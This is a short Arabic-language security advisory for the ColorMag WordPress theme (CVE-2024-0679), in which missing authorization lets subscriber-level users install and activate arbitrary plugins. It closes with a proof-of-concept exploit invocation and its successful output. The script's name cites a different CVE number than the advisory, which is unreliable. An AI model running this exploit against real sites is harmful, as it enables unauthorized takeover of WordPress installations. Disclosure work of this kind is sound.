
ColorMag <= 3.1.2 - نقص التفويض يسمح للمستخدمين المصادَق عليهم (مشترك+) بتثبيت/تفعيل إضافات بشكل تعسفي
ColorMag <= 3.1.2 - نقص في التحقق من الصلاحية يسمح للمستخدمين المصادق عليهم (مشترك فما فوق) بتثبيت وتفعيل إضافات بشكل تعسفي
قالب ColorMag لـ WordPress عرضة للوصول غير المصرح به بسبب عدم وجود فحص للصلاحيات في الدالة plugin_action_callback() في جميع الإصدارات حتى 3.1.2 وما يشملها. وهذا يتيح للمهاجمين المصادق عليهم، بصلاحية مستوى المشترك فما فوق، تثبيت وتفعيل إضافات عشوائية.
Severity: medium
CVE ID: CVE-2024-0679
CVSS Score: 6.5
CVSS Metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N
Plugin Slug: colormag
WPScan URL: https://www.wpscan.com/plugin/colormag
Reference URL: https://www.wordfence.com/threat-intel/vulnerabilities/id/e982d457-29db-468f-88c3-5afe04002dcf?source=api-prod
$ python3 CVE-2024-0705.py --url http://wordpress.lan --username user --password useruser1 --slug ai-engine --plugin ai-engine/ai-engine.php
Logged in successfully.
Getting Nonce!
5e0195de06
Installing Plugin!
HTTP STATUS: 200 Response: {"success":true,"data":{"message":"Plugin activated successfully!"}}